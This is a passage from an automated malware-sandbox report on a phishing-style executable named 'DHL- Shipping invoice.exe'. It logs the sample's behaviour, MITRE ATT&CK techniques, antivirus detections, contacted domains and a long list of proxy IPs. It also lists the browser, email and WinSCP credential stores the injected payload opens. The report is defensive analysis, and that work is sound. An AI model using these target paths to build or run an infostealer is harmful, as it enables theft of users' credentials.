                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL- Shipping invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.LOG1.5.dr, Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2903520132.000000000291B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2903520132.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2900244070.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2903520132.000000000292C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 44380, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2903520132.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2900244070.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 44380, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2903520132.000000000291B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2903520132.00000000028F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2900244070.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2903520132.000000000292C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 44380, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts211
                Process Injection
                1
                Obfuscated Files or Information
                11
                Input Capture
                24
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Timestomp
                1
                Credentials in Registry
                1
                Query Registry
                SMB/Windows Admin Shares1
                Email Collection
                11
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDS121
                Security Software Discovery
                Distributed Component Object Model11
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script141
                Virtualization/Sandbox Evasion
                LSA Secrets1
                Process Discovery
                SSHKeylogging24
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                Process Injection
                Cached Domain Credentials141
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                System Network Configuration Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                DHL- Shipping invoice.exe29%ReversingLabsByteCode-MSIL.Trojan.Zilla
                DHL- Shipping invoice.exe38%VirustotalBrowse
                DHL- Shipping invoice.exe100%AviraHEUR/AGEN.1313217
                DHL- Shipping invoice.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://173.212.209.49:316730%Avira URL Cloudsafe
                http://43.134.20.174:156730%Avira URL Cloudsafe
                http://104.21.6.88:800%Avira URL Cloudsafe
                http://136.239.176.66:8080://proxy0%Avira URL Cloudsafe
                http://5.252.23.220:31280%Avira URL Cloudsafe
                http://50.145.6.360%Avira URL Cloudsafe
                http://125.25.40.30%Avira URL Cloudsafe
                http://176.99.0%Avira URL Cloudsafe
                http://51.89.173.40:51612://proxy0%Avira URL Cloudsafe
                http://188.164.196.31:494260%Avira URL Cloudsafe
                http://50.145.6.380%Avira URL Cloudsafe
                http://162.241.79.22:50207://proxy0%Avira URL Cloudsafe
                http://172.67.255.224://proxy0%Avira URL Cloudsafe
                http://103.146.196.97:326500%Avira URL Cloudsafe
                http://46.101.19.131://proxy0%Avira URL Cloudsafe
                http://103.28.121.58:3128://proxy0%Avira URL Cloudsafe
                http://50.145.6.320%Avira URL Cloudsafe
                http://50.169.135.10:800%Avira URL Cloudsafe
                http://184.178.172.25:152910%Avira URL Cloudsafe
                http://38.50.130.93:56780%Avira URL Cloudsafe
                http://67.43.236.22:23927://proxy0%Avira URL Cloudsafe
                http://113.160.16.142:5678://proxy0%Avira URL Cloudsafe
                http://204.11.158.50:59886://proxy0%Avira URL Cloudsafe
                http://201.77.108.64:9990%Avira URL Cloudsafe
                http://27.0.234.206:1080://proxy0%Avira URL Cloudsafe
                http://31.170.53.140://proxy0%Avira URL Cloudsafe
                http://181.205.46.178:46660%Avira URL Cloudsafe
                http://203.128.77.213:333780%Avira URL Cloudsafe
                http://23.108.42.155:81180%Avira URL Cloudsafe
                http://98.64.169.17:8080://proxy0%Avira URL Cloudsafe
                http://2.179.193.146:31280%Avira URL Cloudsafe
                http://38.48.98.38:280800%Avira URL Cloudsafe
                http://103.90.227.244:31280%Avira URL Cloudsafe
                http://117.54.114.101://proxy0%Avira URL Cloudsafe
                http://27.44.32.188:533090%Avira URL Cloudsafe
                http://72.10.160.170:5385://proxy0%Avira URL Cloudsafe
                http://103.113.71.230:10800%Avira URL Cloudsafe
                http://188.166.252.135:8080://proxy0%Avira URL Cloudsafe
                http://13.234.24.116:31280%Avira URL Cloudsafe
                http://94.131.203.7:80800%Avira URL Cloudsafe
                http://173.212.237.43:64735://proxy0%Avira URL Cloudsafe
                http://149.126.101.162:8080://proxy0%Avira URL Cloudsafe
                http://188.132.222.194:8080://proxy0%Avira URL Cloudsafe
                http://1.0.0.840%Avira URL Cloudsafe
                http://107.180.90.88:203090%Avira URL Cloudsafe
                http://139.255.94.122:396350%Avira URL Cloudsafe
                http://103.12.246.105:4145://proxy0%Avira URL Cloudsafe
                http://183.88.184.48:80800%Avira URL Cloudsafe
                http://72.37.216.68:41450%Avira URL Cloudsafe
                http://43.153.177.137:132200%Avira URL Cloudsafe
                http://62.99.138.162://proxy0%Avira URL Cloudsafe
                http://72.10.164.178:22510%Avira URL Cloudsafe
                http://111.59.4.88:9002://proxy0%Avira URL Cloudsafe
                http://104.19.235.100%Avira URL Cloudsafe
                http://103.217.213.145:4145://proxy0%Avira URL Cloudsafe
                http://36.89.245.65:8080://proxy0%Avira URL Cloudsafe
                http://51.81.186.179:51405://proxy0%Avira URL Cloudsafe
                http://113.161.93.29:8080://proxy0%Avira URL Cloudsafe
                http://101.109.20.71:41450%Avira URL Cloudsafe
                http://183.234.215.11:8443://proxy0%Avira URL Cloudsafe
                http://92.205.110.118:154300%Avira URL Cloudsafe
                http://202.139.198.15:3060://proxy0%Avira URL Cloudsafe
                http://72.10.160.90:74810%Avira URL Cloudsafe
                http://211.234.125.5:4430%Avira URL Cloudsafe
                http://177.159.145.26:4153://proxy0%Avira URL Cloudsafe
                http://3.73.120.104:3128://proxy0%Avira URL Cloudsafe
                http://157.230.226.230:1202://proxy0%Avira URL Cloudsafe
                http://67.43.228.253:14870%Avira URL Cloudsafe
                http://50.169.23.170:800%Avira URL Cloudsafe
                http://103.234.24.105:88800%Avira URL Cloudsafe
                http://94.45.152.86:48256://proxy0%Avira URL Cloudsafe
                http://106.0.62.700%Avira URL Cloudsafe
                http://161.97.173.42:50386://proxy0%Avira URL Cloudsafe
                http://104.17.166.210:800%Avira URL Cloudsafe
                http://182.253.181.10:8080://proxy0%Avira URL Cloudsafe
                http://47.91.65.23:31280%Avira URL Cloudsafe
                http://162.214.170.144:317010%Avira URL Cloudsafe
                http://180.183.215.154:41530%Avira URL Cloudsafe
                http://84.241.8.234:80800%Avira URL Cloudsafe
                http://46.219.8.201:41890://proxy0%Avira URL Cloudsafe
                http://50.168.210.239:800%Avira URL Cloudsafe
                http://50.231.110.26://proxy0%Avira URL Cloudsafe
                http://185.129.250.1830%Avira URL Cloudsafe
                http://45.174.87.18:999://proxy0%Avira URL Cloudsafe
                http://203.170.146.146:41530%Avira URL Cloudsafe
                http://31.7.65.18:443://proxy0%Avira URL Cloudsafe
                http://193.30.13.18:9990%Avira URL Cloudsafe
                http://52.172.1.1860%Avira URL Cloudsafe
                http://162.214.165.6:42624://proxy0%Avira URL Cloudsafe
                http://37.26.223.96:9080://proxy0%Avira URL Cloudsafe
                http://35.207.123.94://proxy0%Avira URL Cloudsafe
                http://45.138.87.238:10800%Avira URL Cloudsafe
                http://92.242.212.50:8080://proxy0%Avira URL Cloudsafe
                http://185.49.31.207:8081://proxy0%Avira URL Cloudsafe
                http://212.110.188.216:34405://proxy0%Avira URL Cloudsafe
                http://165.232.89.116:3128://proxy0%Avira URL Cloudsafe
                http://82.223.102.92:9443://proxy0%Avira URL Cloudsafe
                http://203.81.67.22:80800%Avira URL Cloudsafe
                http://206.42.40.0:56780%Avira URL Cloudsafe
                http://31.217.213.227:8090://proxy0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                orako.co.ke
                34.195.165.88
                truetrue
                  unknown
                  ktxcomay.com.vn
                  222.255.238.159
                  truefalse
                    unknown
                    artemis-rat.com
                    104.21.54.158
                    truefalse
                      unknown
                      github.com
                      140.82.112.4
                      truefalse
                        high
                        api.ipify.org
                        172.67.74.152
                        truefalse
                          high
                          mail.orako.co.ke
                          unknown
                          unknowntrue
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://188.164.196.31:49426DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98174D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
